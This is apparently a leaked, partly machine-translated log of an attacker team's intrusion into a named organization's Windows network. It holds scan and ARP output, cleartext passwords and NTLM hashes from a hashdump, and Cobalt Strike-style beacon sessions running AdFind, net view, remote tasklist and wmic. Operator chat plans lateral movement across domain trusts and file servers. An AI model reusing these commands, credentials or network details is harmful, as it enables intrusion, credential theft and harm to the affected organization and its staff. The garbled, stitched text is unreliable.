.: Yes Wireless LAN adapter WiFi: Connection-specific DNS Suffix : Description . . . . . : Intel(R) Wi-Fi 6 AX200 160MHz Physical Address . . . . .: 3E-5E-B9-EB-F9-F8 DHCP Enabled . . . . .: Yes Autoconfiguration Enabled. .: Yes IPv6 Address. . . . : 2a02:c7f:d417:c000:fcae:695d:8216:8644(Preferred) IPv6 Address. . . . : fda8:e756:3c36:0:fcae:695d:8216:8644(Preferred) Temporary IPv6 Address. . . : 2a02:c7f:d417:c000:848b:70e:a51c:a5c3(Preferred) Temporary IPv6 Address. . . : fda8:e756:3c36:0:6806:3a52:eadd:8175(Preferred) Link-local IPv6 Address . . . : fe80::fcae:695d:8216:8644%10(Preferred) IPv4 Address . . . . . 192.168.0.16(Preferred) Subnet Mask . . . : 255.255.255.0 Lease Obtained . . . . ♪ 21 September 2020 17:20:50 ♪ Lease Expires . . . . ♪ 23 September 2020 13:55:43 ♪ Default Gateway . . . . : fe80::3e89:94ff:fe6e:1249%10 192.168.0.1 DHCP Server . . . . : 192.168.0.1 DHCPv6 IAID . . . . : 174125666 DHCPv6 Client DUID . . . . : 00-01-00-01-25-FB-F4-0B-E8-D8-D1-F3-F7-7E DNS Servers . . . . : fda8:e756:3c36:0:3e89:94ff:fe6e:1248 NetBIOS over Tcpip . . . .: Enabled Ethernet adapter Bluetooth Network Connection: Media state ... ... ... ♪ Media disconnected ♪ Connection-specific DNS Suffix : Description . . . . . ♪ Bluetooth Device (Personal Area Network) ♪ Physical Address . . . . .: 60-F2-62-90-AE-65 DHCP Enabled. . . . .: Yes Autoconfiguration Enabled. .: Yes Tunnel adapter Teredo Tunneling Pseudo-Interface: Connection-specific DNS Suffix : Description . . . . . ♪ Microsoft Teredo Tunneling Adapter ♪ Physical Address . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled . . . . .: No Autoconfiguration Enabled . .: Yes IPv6 Address. . . . : 2001:0:2851:7ae4:2036:bad:a1f9:8e7c(Preferred) Link-local IPv6 Address . . . : fe80::2036:bad:a1f9:8e7c%11(Preferred) Default Gateway . . . . : NetBIOS over Tcpip . . . . : Disabled `````` (ARP) Target '192.168.0.16' is alive. 3E-5E-B9-EB-F9-F8 (ARP) Target '192.168.0.1' is alive. 
3C-89-94-6E-12-49 (ARP) Target '192.168.0.26' is alive. BC-A5-11-97-4D-A1 (ARP) Target '192.168.0.12' is alive. (ARP) Target '192.168.0.3' is alive. (ARP) Target '192.168.0.23' is alive. 02(ARP) Target '192.168.0.2' is alive. AC(ARP) Target '192.168.0.4' is alive. (ARP) Target '192.168.0.8' is alive. (ARP) Target '192.168.0.6' is alive. B0-68-E6-1D-DC-8F (ARP) Target '192.168.0.18' is alive. F0-99-B6-26-91-33 (ARP) Target '192.168.0.9' is alive. 0C-B2-B7-1C-9C-9B (ARP) Target '192.168.0.7' is alive. 02-0F-B5-81-CD-E1 (ARP) Target '192.168.0.17' is alive. BC-92-6B-7A-D8-BF (ARP) Target '192.168.0.10' is alive. (ARP) Target '192.168.0.13' is alive. C098--3801--96A7--6492--6437--DC83 (ARP) Target '192.168.0.128' is alive. 02-0F-B5-0B-15-44 192.168.0.10:631 192.168.0.10:515 192.168.0.10:443 192.168.0.10:23 192.168.0.10:80 192.168.0.10:21 (220 FTP print service:V-1.13/Use the network password for the ID if updating.) 192.168.0.7:5000 192.168.0.7:53 192.168.0.7:80 192.168.0.8:80 192.168.0.16:5040 192.168.0.16:3389 192.168.0.16:999 192.168.0.16:443 192.168.0.1:5431 192.168.0.16:139 192.168.0.16:135 192.168.0.16:80 192.168.0.1:5300 192.168.0.1:443 192.168.0.1:80 192.168.0.1:53 192.168.0.16:445 (platform: 500 version: 10.0 name: UKHECSLT3028 domain: MATCHES) ``vpn does not seem to be connected`` Domain: UKHECSLT3028 Login: Administrator Password: 192837465S! 
NTLM: f490c4823837a7d002e0176f3c5203ad Domain: MATCHES Login: mercedesd Password: Dinham2323 NTLM: 7c839aa54221edb65e959f18ab9bde41 ````hashdump` ``` Administrator:500:aad3b435b51404eeaad3b435b51404ee:f490c4823837a7d002e0176f3c5203ad::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1a20cb05b4b6db77e592dee4e974e4d9::: ``AdFind dies on local admin, under other users doesn't work at all ``` [*] Tasked beacon to run: C:\Users\Administrator\AdFind.exe -f "(objectcategory=person)" > ad_users.txt [+] host called home, sent: 108 bytes [+] received output: AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x51 (81) - Server Down Terminating program. `````` beacon> shell net localgroup "Administrators" [*] Tasked beacon to run: net localgroup "Administrators" [+] host called home, sent: 62 bytes [+] received output: Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator MATCHES\domain admins MATCHES\sec_WorkstationLocalAdmin The command completed successfully. 
``All>operatingSystem: Windows Server 2012 R2 Standard misread[ ](https://mediaeveryone.com/group/saiglobal-com?msg=k7PCBz9uHZfYGa3QG) yes, I got that from the description in ad_comp`` beacon> shell tasklist /s 10.225.10.53 /v [*] Tasked beacon to run: tasklist /s 10.225.10.53 /v [+] host called home, sent: 58 bytes [+] received output: Image Name PID Session Name Session# Mem Usage User Name CPU Time ========================= ======== ================ =========== ============ ================================================== ============ System Idle Process 0 Services 0 4 K NT AUTHORITY\SYSTEM 830:25:19 System 4 Services 0 276 K N/A 0:40:04 smss.exe 236 Services 0 1,036 K NT AUTHORITY\SYSTEM 0:00:00 csrss.exe 332 Services 0 4,020 K NT AUTHORITY\SYSTEM 0:00:44 wininit.exe 388 Services 0 3,892 K NT AUTHORITY\SYSTEM 0:00:00 csrss.exe 396 Console 1 3,576 K NT AUTHORITY\SYSTEM 0:00:00 winlogon.exe 440 Console 1 5,904 K NT AUTHORITY\SYSTEM 0:00:00 services.exe 484 Services 0 10,748 K NT AUTHORITY\SYSTEM 1:35:33 lsass.exe 492 Services 0 17,544 K NT AUTHORITY\SYSTEM 0:06:05 svchost.exe 556 Services 0 11,484 K NT AUTHORITY\SYSTEM 0:01:11 svchost.exe 600 Services 0 9,812 K NT AUTHORITY\NETWORK SERVICE 0:12:19 LogonUI.exe 684 Console 1 24,144 K NT AUTHORITY\SYSTEM 0:00:00 MsMpEng.exe 696 Services 0 175,280 K NT AUTHORITY\SYSTEM 1:37:48 dwm.exe 704 Console 1 22,012 K Window Manager\DWM-1 0:00:00 svchost.exe 808 Services 0 17,876 K NT AUTHORITY\LOCAL SERVICE 0:14:12 svchost.exe 848 Services 0 15,752 K NT AUTHORITY\SYSTEM 0:00:37 svchost.exe 868 Services 0 61,204 K NT AUTHORITY\SYSTEM 2:42:51 svchost.exe 920 Services 0 14,020 K NT AUTHORITY\LOCAL SERVICE 0:00:26 svchost.exe 1000 Services 0 21,656 K NT AUTHORITY/NETWORK SERVICE 0:05:03 svchost.exe 584 Services 0 11,044 K NT AUTHORITY\LOCAL SERVICE 0:00:39 spoolsv.exe 1132 Services 0 13,264 K NT AUTHORITY\SYSTEM 0:00:11 svchost.exe 1168 Services 0 7,832 K NT AUTHORITY\SYSTEM 0:00:05 ir_agent.exe 1188 Services 0 13,808 K NT 
AUTHORITY\SYSTEM 0:01:04 conhost.exe 1300 Services 0 3,024 K NT AUTHORITY\SYSTEM 0:00:01 newrelic-infra.exe 1308 Services 0 26,188 K NT AUTHORITY\SYSTEM 5:46:01 ir_agent.exe 1324 Services 0 66,396 K NT AUTHORITY\SYSTEM 1:05:42 snmp.exe 1400 Services 0 6,988 K NT AUTHORITY\SYSTEM 0:02:56 svchost.exe 1416 Services 0 15,644 K NT AUTHORITY\SYSTEM 0:01:38 svchost.exe 1440 Services 0 13,916 K NT AUTHORITY\SYSTEM 0:00:39 vmtoolsd.exe 1472 Services 0 13,900 K NT AUTHORITY\SYSTEM 0:09:48 WmiApSrv.exe 1572 Services 0 8,292 K NT AUTHORITY\SYSTEM 0:01:02 wmi_exporter.exe 1656 Services 0 15,924 K NT AUTHORITY\SYSTEM 0:00:34 WmiPrvSE.exe 1764 Services 0 40,132 K NT AUTHORITY\SYSTEM 0:37:12 WmiPrvSE.exe 1784 Services 0 24,328 K NT AUTHORITY\NETWORK SERVICE 4:11:00 svchost.exe 1536 Services 0 67,976 K NT AUTHORITY\NETWORK SERVICE 0:01:17 svchost.exe 2156 Services 0 4,808 K NT AUTHORITY\NETWORK SERVICE 0:00:03 dllhost.exe 2300 Services 0 10,956 K NT AUTHORITY\SYSTEM 0:00:04 msdtc.exe 2496 Services 0 7,384 K NT AUTHORITY\NETWORK SERVICE 0:00:03 WmiPrvSE.exe 2820 Services 0 10,876 K NT AUTHORITY\LOCAL SERVICE 0:23:58 CcmExec.exe 3364 Services 0 118,580 K NT AUTHORITY\SYSTEM 0:12:01 WmiPrvSE.exe 3396 Services 0 26,704 K NT AUTHORITY\SYSTEM 0:00:36 WmiPrvSE.exe 3644 Services 0 30,296 K NT AUTHORITY\SYSTEM 0:18:55 WmiPrvSE.exe 3752 Services 0 10,024 K NT AUTHORITY\LOCAL SERVICE 0:02:27 WmiPrvSE.exe 552 Services 0 6,632 K NT AUTHORITY\LOCAL SERVICE 0:00:01 CmRcService.exe 2088 Services 0 8,784 K NT AUTHORITY\SYSTEM 0:00:09 ir_agent.exe 3136 Services 0 100,072 K NT AUTHORITY\SYSTEM 0:43:25 ir_agent.exe 244 Services 0 63,524 K NT AUTHORITY\SYSTEM 0:25:59 ir_agent.exe 3260 Services 0 47,284 K NT AUTHORITY\SYSTEM 0:05:57 csrss.exe 2252 RDP-Tcp#0 2 14,128 K NT AUTHORITY\SYSTEM 0:00:00 winlogon.exe 1068 RDP-Tcp#0 2 5,292 K NT AUTHORITY\SYSTEM 0:00:00 dwm.exe 2216 RDP-Tcp#0 2 39,120 K Window Manager\DWM-2 0:00:04 taskhostex.exe 3388 RDP-Tcp#0 2 6,520 K DATACENTER\adm.cotral0 0:00:00 rdpclip.exe 
2268 RDP-Tcp#0 2 6,908 K DATACENTER\adm.cotral0 0:00:00 explorer.exe 1716 RDP-Tcp#0 2 2,236 K DATACENTER\adm.cotral0 0:00:20 WmiPrvSE.exe 2068 Services 0 15,960 K NT AUTHORITY\SYSTEM 0:00:22 vmtoolsd.exe 2916 RDP-Tcp#0 2 12,688 K DATACENTER\adm.cotral0 0:03:14 msseces.exe 2116 RDP-Tcp#0 2 13,852 K DATACENTER\adm.cotral0 0:00:00 SCNotification.exe 1100 RDP-Tcp#0 2 40,204 K DATACENTER\adm.cotral0 0:00:06 xagt.exe 2064 Services 0 7,516 K NT AUTHORITY\SYSTEM 0:00:01 xagtnotif.exe 3276 RDP-Tcp#0 2 6,520 K DATACENTER\adm.cotral0 0:00:00 ir_agent.exe 1208 Services 0 51,040 K NT AUTHORITY\SYSTEM 0:00:06 ir_agent.exe 3624 Services 0 49,988 K NT AUTHORITY\SYSTEM 0:00:06 ``What does the operation system in hell do they say? UAT is hardly NAS )))) processes look more ping -> shell dir \\223145483475843\C$ ?``` Supposedly saturated: >description: C360 Client Files USHDC1-CSPFPS03.datacenter.local USHDC1-CSPFPS12.datacenter.local USHDC1-CSPFPS08.datacenter.local USHDC1-CSPFPS02.datacenter.local USHDC1-CSPFPS04.datacenter.local USHDC1-CSPFPS14.datacenter.local USHDC1-CSPFPS13.datacenter.local USHDC1-CSPFPS10.datacenter.local USHDC1-CSPFPS01.datacenter.local USHDC1-CSPFPS09.datacenter.local USHDC1-CSPFPS11.datacenter.local USHDC1-CSPFPS06.datacenter.local USHDC1-CSPFPS05.datacenter.local USHDC1-CSPFPS07.datacenter.local >description: C360 UAT File Servers USHDC1-CSQFPS01.datacenter.local USHDC1-CSQFPS02.datacenter.local ``14 client 2 UAT all SSO can not even draw and crawl there? and they all fs? look[ ](https://mediaeveryone.com/group/saiglobal-com?msg=6LW23aHAC5BNgtnSZ) you mean what I threw above? file servers can still look if in this domain is nothing for backup, looking for virtualization) well I think the data center in other domains do not have anything too ``? 
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct08 02:29:22> net view [*] Tasked beacon to run net view [+] host called home, sent: 104504 bytes [+] received output: List of hosts: Server Name IP Address Platform Version Type Comment ----------- ---------- -------- ------- ---- ------- APP01 10.195.25.144 500 5.2 PDC [+] received output: APP02 10.195.25.147 500 5.2 AUHDC1-COPADS01 10.195.25.50 500 6.3 PDC AUHDC1-COPADS02 10.195.25.49 500 6.3 BDC AUHDC1-COPADS04 10.195.25.35 500 6.3 BDC AUHDC1-COPADS05 10.195.25.43 500 10.0 BDC AUHDC1-COPAPP08 10.195.25.20 500 6.3 AUHDC1-COPFPS01 10.195.25.115 500 6.3 AUHDC1-COPFPS02 10.195.25.3 500 6.3 AUHDC1-COPFPS03 10.195.25.54 500 10.0 AUHDC1-COPSCM01 10.195.25.210 500 6.3 AUHDC1-COPSCM02 10.195.25.211 500 6.3 AUHDC1-COPSCM04 10.195.25.218 500 6.3 AUHDC1-COPSQL01 10.195.25.212 500 6.3 AUHDC1-COPSQL02 10.195.25.213 500 6.3 AUHDC1-COPSQL11 10.195.25.125 500 6.3 AUHDC1-COQSQL06 10.195.25.36 500 6.3 AUSYDE95X-SON2 10.195.25.184 500 6.0 AUSYDHC-APP006 10.195.25.84 500 4.0 AUSYDHC-APP016 10.195.25.76 500 5.2 AUSYDHC-APP025 10.195.25.175 500 5.2 AUSYDHC-APP027 10.195.25.94 500 6.0 AUSYDHC-COPMG05 10.195.25.242 500 6.1 AUSYDHC-CS-APP1 10.195.25.114 500 5.2 AUSYDHC-CS-MOS1 10.195.25.63 500 5.2 AUSYDHC-CSPSQ01 10.195.25.214 500 6.1 AUSYDHC-EPPCON1 10.195.25.235 500 6.0 AUSYDHC-EPPPS1 10.195.25.52 500 10.0 AUSYDHC-EPPREP1 10.195.25.225 500 6.0 AUSYDHC-EPPREP2 10.195.25.226 500 6.0 AUSYDHC-EPPSON1 10.195.25.238 500 6.0 AUSYDHC-LDS1 10.195.25.62 500 6.0 AUSYDHC-SQL16 10.195.25.178 500 6.1 AUSYDHQ-FS1 10.195.25.3 500 6.3 AUSYDHQ-FS1TEST 10.195.25.3 500 6.3 ``>description: C360 UAT File Servers>description: C360 Client Files and net view will not work ? Backup Veeam no ``veeam``? the host names do not have any keywords pointing to nas, backup, veeam etc? and how to get them out? why? then portscan 21 22 ? they can be winnows if ad_comp has no linux, so no nas either? 
if there are no linuxes then there are no linuxes either :thinking:but i think at least 2-3 pcs will be open then there will be no 100% coverage and some domains will not be visible from anywhere each domain can see some trusts which originally were not visible you have 19 pcs were originally in the total 19 pcs were originallydatacenter.local ``` 0: SAIG saig.frd.global (Direct Outbound) 1: FRD frd.global (Direct Outbound) (Direct Inbound) 2: DATACENTER datacenter.local (Forest tree root) (Primary Domain) (Native) ``There's more, take off just from the current where @user8`saig.frd.global`` which is in the ADvot in this saiglobal.com he had 2 datacenters in trusts[ ](https://mediaeveryone.com/group/saiglobal-com?msg=t7mimJ5JXQBP2Qbrf) please sign from which domain one domain sees some trusts from the general list that does not see the others `` 0: 80-20 80-20.com (Direct Outbound) 1: LEGALCO legalco.local (Direct Outbound) (Direct Inbound) 2: FRD frd.global (Forest tree root) (Direct Outbound) (Direct Inbound) 3: ANSTAT Anstat.local (Direct Outbound) (Direct Inbound) 4: LEADERS leaders.frd.global 5: AUST standards.com.au (Direct Outbound) (Direct Inbound) 6: SAIGPROD SaigProd.local (Direct Outbound) (Direct Inbound) 7: C360 c360.local (Direct Outbound) (Direct Inbound) 8: DATACENTER datacenter.local (Direct Outbound) (Direct Inbound) 9: C360UK c360uk.local (Direct Outbound) (Direct Inbound) 10: SAIG saig.frd.global (Forest 2) (Primary Domain) (Native) They are not 1 in 1between different domains where sessions hangs just net domain_trusts the same name and the same1 of the quarantines in trusts 2 datacenter exactly not understand at least noticed different between frd.global and saig...., datacenter ... in trusts then all the same have to get into the rest of the domain-[ ](https://mediaeveryone.com/group/saiglobal-com?msg=BxbusgHiy84BsvA2G) trusts in terms of direct new or trusts from this? 
Web Server - 25 ``` and there are other servers in this category which respond to pings correctly ? you still have not dealt with new domains? can i do it tomorrow or still look for options kinin in 100% lols in datacenters dka you ping from where kst? => sds and cso in dizable, web i leave? besides this in 1 domain is not particularly critical i think100% lolsstukRDS - 2 Web Server - 25 SSO - 1category? what is meant by "critical "28critical? a lot of them? servers with 100% loss also in Disabled? right) and now pinging all to see which are still cut off :sunglasses:aha in Disabled Servers then? beacon> shell ping USHDC1-CSPSPH01.datacenter.local [*] Tasked beacon to run: ping USHDC1-CSPSPH01.datacenter.local [+] host called home, sent: 68 bytes [+] received output: Ping request could not find host USHDC1-CSPSPH01.datacenter.local. Please check the name and try again. beacon> shell ping USHDC1-CSPSPH02.datacenter.local [*] Tasked beacon to run: ping USHDC1-CSPSPH02.datacenter.local [+] host called home, sent: 68 bytes [+] received output: Ping request could not find host USHDC1-CSPSPH02.datacenter.local. Please check the name and try again. ``` These are the last OU=C360 - SSO servers with different outbound services I guess OU=SCCM - SCCM servers the last one I don't know... 
CN=USHDC1-CSPFPS03,OU=Production,OU=C360,OU=Servers,OU=0.SAI Global,DC=datacenter,DC=local >dNSHostName: USHDC1-CSPFPS03.datacenter.local >servicePrincipalName: CmRcService/USHDC1-CSPFPS03 >servicePrincipalName: CmRcService/USHDC1-CSPFPS03.datacenter.local >servicePrincipalName: WSMAN/USHDC1-CSPFPS03 >servicePrincipalName: WSMAN/USHDC1-CSPFPS03.datacenter.local >servicePrincipalName: TERMSRV/USHDC1-CSPFPS03 >servicePrincipalName: TERMSRV/USHDC1-CSPFPS03.datacenter.local >servicePrincipalName: RestrictedKrbHost/USHDC1-CSPFPS03 >servicePrincipalName: HOST/USHDC1-CSPFPS03 >servicePrincipalName: RestrictedKrbHost/USHDC1-CSPFPS03.datacenter.local >servicePrincipalName: HOST/USHDC1-CSPFPS03.datacenter.local ``` ``` CN=USHDC1-CSPMGW02,OU=Production,OU=C360,OU=Servers,OU=0.SAI Global,DC=datacenter,DC=local >dNSHostName: USHDC1-CSPMGW02.datacenter.local >servicePrincipalName: WSMAN/USHDC1-CSPMGW02.datacenter.local >servicePrincipalName: WSMAN/USHDC1-CSPMGW02 >servicePrincipalName: CmRcService/USHDC1-CSPMGW02.datacenter.local >servicePrincipalName: CmRcService/USHDC1-CSPMGW02 >servicePrincipalName: TERMSRV/USHDC1-CSPMGW02.datacenter.local >servicePrincipalName: TERMSRV/USHDC1-CSPMGW02 >servicePrincipalName: RestrictedKrbHost/USHDC1-CSPMGW02 >servicePrincipalName: HOST/USHDC1-CSPMGW02 >servicePrincipalName: RestrictedKrbHost/USHDC1-CSPMGW02.datacenter.local >servicePrincipalName: HOST/USHDC1-CSPMGW02.datacenter.local ``` ``` CN=USHDC1-CSPAPP23,OU=Production,OU=C360,OU=Servers,OU=0.SAI Global,DC=datacenter,DC=local >dNSHostName: USHDC1-CSPAPP23.datacenter.local >servicePrincipalName: CmRcService/USHDC1-CSPAPP23 >servicePrincipalName: CmRcService/USHDC1-CSPAPP23.datacenter.local >servicePrincipalName: WSMAN/USHDC1-CSPAPP23 >servicePrincipalName: WSMAN/USHDC1-CSPAPP23.datacenter.local >servicePrincipalName: TERMSRV/USHDC1-CSPAPP23 >servicePrincipalName: TERMSRV/USHDC1-CSPAPP23.datacenter.local >servicePrincipalName: RestrictedKrbHost/USHDC1-CSPAPP23 >servicePrincipalName: 
HOST/USHDC1-CSPAPP23 >servicePrincipalName: RestrictedKrbHost/USHDC1-CSPAPP23.datacenter.local >servicePrincipalName: HOST/USHDC1-CSPAPP23.datacenter.local ``` ``` CN=USHDC1-COPSCM02,OU=SCCM,OU=Corporate IT,OU=Servers,OU=0.SAI Global,DC=datacenter,DC=local >dNSHostName: USHDC1-COPSCM02.datacenter.local >servicePrincipalName: CmRcService/USHDC1-COPSCM02.datacenter.local >servicePrincipalName: CmRcService/USHDC1-COPSCM02 >servicePrincipalName: WSMAN/USHDC1-COPSCM02.datacenter.local >servicePrincipalName: WSMAN/USHDC1-COPSCM02 >servicePrincipalName: TERMSRV/USHDC1-COPSCM02.datacenter.local >servicePrincipalName: TERMSRV/USHDC1-COPSCM02 >servicePrincipalName: RestrictedKrbHost/USHDC1-COPSCM02 >servicePrincipalName: HOST/USHDC1-COPSCM02 >servicePrincipalName: RestrictedKrbHost/USHDC1-COPSCM02.datacenter.local >servicePrincipalName: HOST/USHDC1-COPSCM02.datacenter.local ``` ``` CN=USHDC1-CSPSPH02,OU=Production,OU=DM360,OU=Servers,OU=0.SAI Global,DC=datacenter,DC=local >dNSHostName: USHDC1-CSPSPH02.datacenter.local >servicePrincipalName: CmRcService/USHDC1-CSPSPH02.datacenter.local >servicePrincipalName: CmRcService/USHDC1-CSPSPH02 >servicePrincipalName: WSMAN/USHDC1-CSPSPH02.datacenter.local >servicePrincipalName: WSMAN/USHDC1-CSPSPH02 >servicePrincipalName: TERMSRV/USHDC1-CSPSPH02 >servicePrincipalName: TERMSRV/USHDC1-CSPSPH02.datacenter.local >servicePrincipalName: RestrictedKrbHost/USHDC1-CSPSPH02 >servicePrincipalName: HOST/USHDC1-CSPSPH02 >servicePrincipalName: RestrictedKrbHost/USHDC1-CSPSPH02.datacenter.local >servicePrincipalName: HOST/USHDC1-CSPSPH02.datacenter.local ``Everything* throw full hostnames with groupsMH would give you a better idea of what to do: FPS MGW ARP SCM SEC SPH ?``` USHDC1-360MX2.datacenter.local USHDC1-360MX1.datacenter.local ``` These are in the exchanger, right? look for access to his console...as file server ``. 
Image Name PID Session Name Session# Mem Usage User Name CPU Time ========================= ======== ================ =========== ============ ================================================== ============ System Idle Process 0 Services 0 4 K NT AUTHORITY\SYSTEM 827:32:16 System 4 Services 0 264 K N/A 5:43:18 smss.exe 224 Services 0 1,036 K NT AUTHORITY\SYSTEM 0:00:00 csrss.exe 340 Services 0 3,964 K NT AUTHORITY\SYSTEM 0:00:25 csrss.exe 396 Console 1 3,472 K NT AUTHORITY\SYSTEM 0:00:00 wininit.exe 404 Services 0 3,896 K NT AUTHORITY\SYSTEM 0:00:00 winlogon.exe 448 Console 1 5,900 K NT AUTHORITY\SYSTEM 0:00:00 services.exe 492 Services 0 10,908 K NT AUTHORITY\SYSTEM 0:52:07 lsass.exe 500 Services 0 17,576 K NT AUTHORITY\SYSTEM 0:06:28 svchost.exe 560 Services 0 9,644 K NT AUTHORITY\SYSTEM 0:01:19 svchost.exe 592 Services 0 9,244 K NT AUTHORITY\NETWORK SERVICE 0:03:50 LogonUI.exe 688 Console 1 27,424 K NT AUTHORITY\SYSTEM 0:00:00 MsMpEng.exe 700 Services 0 243,516 K NT AUTHORITY\SYSTEM 2:25:24 dwm.exe 712 Console 1 30,044 K Window Manager\DWM-1 0:00:00 svchost.exe 816 Services 0 15,376 K NT AUTHORITY\LOCAL SERVICE 0:08:36 svchost.exe 844 Services 0 15,452 K NT AUTHORITY\SYSTEM 0:00:36 svchost.exe 860 Services 0 86,460 K NT AUTHORITY\SYSTEM 1:19:39 svchost.exe 912 Services 0 12,748 K NT AUTHORITY\LOCAL SERVICE 0:00:25 svchost.exe 992 Services 0 21,736 K NT AUTHORITY/NETWORK SERVICE 0:05:02 svchost.exe 532 Services 0 11,000 K NT AUTHORITY\LOCAL SERVICE 0:00:29 spoolsv.exe 1108 Services 0 13,520 K NT AUTHORITY\SYSTEM 0:00:13 svchost.exe 1148 Services 0 7,856 K NT AUTHORITY\SYSTEM 0:00:05 ir_agent.exe 1172 Services 0 13,176 K NT AUTHORITY\SYSTEM 0:01:04 conhost.exe 1292 Services 0 3,016 K NT AUTHORITY\SYSTEM 0:00:02 snmp.exe 1304 Services 0 6,856 K NT AUTHORITY\SYSTEM 0:03:05 svchost.exe 1336 Services 0 13,584 K NT AUTHORITY\SYSTEM 0:00:59 vmtoolsd.exe 1352 Services 0 13,800 K NT AUTHORITY\SYSTEM 0:09:42 ir_agent.exe 1372 Services 0 63,968 K NT AUTHORITY\SYSTEM 1:09:54 
WmiApSrv.exe 1460 Services 0 8,472 K NT AUTHORITY\SYSTEM 0:01:01 wmi_exporter.exe 1484 Services 0 16,032 K NT AUTHORITY\SYSTEM 0:00:32 WmiPrvSE.exe 1624 Services 0 23,088 K NT AUTHORITY\NETWORK SERVICE 1:55:27 WmiPrvSE.exe 1640 Services 0 48,744 K NT AUTHORITY\SYSTEM 0:31:54 svchost.exe 1908 Services 0 8,936 K NT AUTHORITY\NETWORK SERVICE 0:00:31 svchost.exe 2012 Services 0 4,792 K NT AUTHORITY\NETWORK SERVICE 0:00:02 dllhost.exe 2132 Services 0 11,008 K NT AUTHORITY\SYSTEM 0:00:04 msdtc.exe 2484 Services 0 7,336 K NT AUTHORITY\NETWORK SERVICE 0:00:04 WmiPrvSE.exe 2572 Services 0 29,720 K NT AUTHORITY\SYSTEM 0:19:40 CcmExec.exe 3696 Services 0 113,032 K NT AUTHORITY\SYSTEM 0:11:09 WmiPrvSE.exe 3804 Services 0 13,636 K NT AUTHORITY\SYSTEM 0:00:37 ir_agent.exe 3964 Services 0 92,692 K NT AUTHORITY\SYSTEM 0:40:51 ir_agent.exe 3972 Services 0 63,404 K NT AUTHORITY\SYSTEM 0:25:50 ir_agent.exe 4016 Services 0 47,476 K NT AUTHORITY\SYSTEM 0:06:02 CmRcService.exe 1648 Services 0 8,784 K NT AUTHORITY\SYSTEM 0:00:14 WmiPrvSE.exe 3320 Services 0 6,708 K NT AUTHORITY\LOCAL SERVICE 0:00:01 WmiPrvSE.exe 3048 Services 0 10,388 K NT AUTHORITY\LOCAL SERVICE 0:02:01 ir_agent.exe 2832 Services 0 55,420 K NT AUTHORITY\SYSTEM 0:06:02 ir_agent.exe 2392 Services 0 51,596 K NT AUTHORITY\SYSTEM 0:26:38 xagt.exe 3944 Services 0 7,272 K NT AUTHORITY\SYSTEM 0:00:02 WmiPrvSE.exe 3280 Services 0 8,820 K NT AUTHORITY\LOCAL SERVICE 0:00:00 WmiPrvSE.exe 3600 Services 0 8,176 K NT AUTHORITY\SYSTEM 0:00:00 WmiPrvSE.exe 3396 Services 0 12,148 K NT AUTHORITY\SYSTEM 0:00:00 msiexec.exe 2712 Services 0 5,868 K NT AUTHORITY\SYSTEM 0:00:00 ``Let me see the pids please very...DC - pointer to domain controller FS - indication of a file server 360 - reference to the exechange in general, more precisely to the CCO authorization through the office360 this machine has one interface? dk in spn ldap, and in the oushka should not be written? )this is the domain controller....``. 
CN=USHDC1-360FS1,OU=Production,OU=C360,OU=Servers,OU=0.SAI Global,DC=datacenter,DC=local >dNSHostName: USHDC1-360FS1.datacenter.local >servicePrincipalName: CmRcService/USHDC1-360FS1.datacenter.local >servicePrincipalName: CmRcService/USHDC1-360FS1 >servicePrincipalName: WSMAN/USHDC1-360FS1.datacenter.local >servicePrincipalName: WSMAN/USHDC1-360FS1 >servicePrincipalName: TERMSRV/USHDC1-360FS1 >servicePrincipalName: TERMSRV/USHDC1-360FS1.datacenter.local >servicePrincipalName: RestrictedKrbHost/USHDC1-360FS1 >servicePrincipalName: HOST/USHDC1-360FS1 >servicePrincipalName: RestrictedKrbHost/USHDC1-360FS1.datacenter.local >servicePrincipalName: HOST/USHDC1-360FS1.datacenter.local ``Well, I guess... what is the host's name and what is its OU/group? Name Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40660 Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Visual C++ 2005 Redistributable (x64) VMware Tools Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.60610 Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.60610 Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40660 Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.60610 Windows Firewall Configuration Provider Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Forefront Endpoint Protection 2010 Server Management FireEye Endpoint Agent Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40660 Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.60610 Configuration Manager Client Microsoft RichCopy 4.0 Microsoft Endpoint Protection Management Components Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40660 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Windows Resource Kit Tools - SubInAcl.exe Microsoft Silverlight Microsoft Security Client Microsoft Policy Platform WMI Exporter Rapid7 Insight Agent ``It also worked out``. 
```
shell wmic /node:10.225.10.202 product get name
```
It's not working under the token. Try wmic. Maybe the port is closed... under the token?
```
beacon> shell tasklist /s 10.225.10.202 /v
[*] Tasked beacon to run: tasklist /s 10.225.10.202 /v
[+] host called home, sent: 59 bytes
```
Aha, last time I didn't have time to query the tasklists; all that's left is the ones below and the "directory of servers" by assignment.
1
```
dn:CN=saig.frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/06/09-00:59:39 AUS Eastern Daylight Time
>name: saig.frd.global
>securityIdentifier: S-1-5-21-2959458370-3657645319-1944215935
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: saig.frd.global
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/04/14-00:59:25 AUS Eastern Daylight Time
>name: frd.global
>securityIdentifier: S-1-5-21-2724714270-1340506477-316473475
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: frd.global
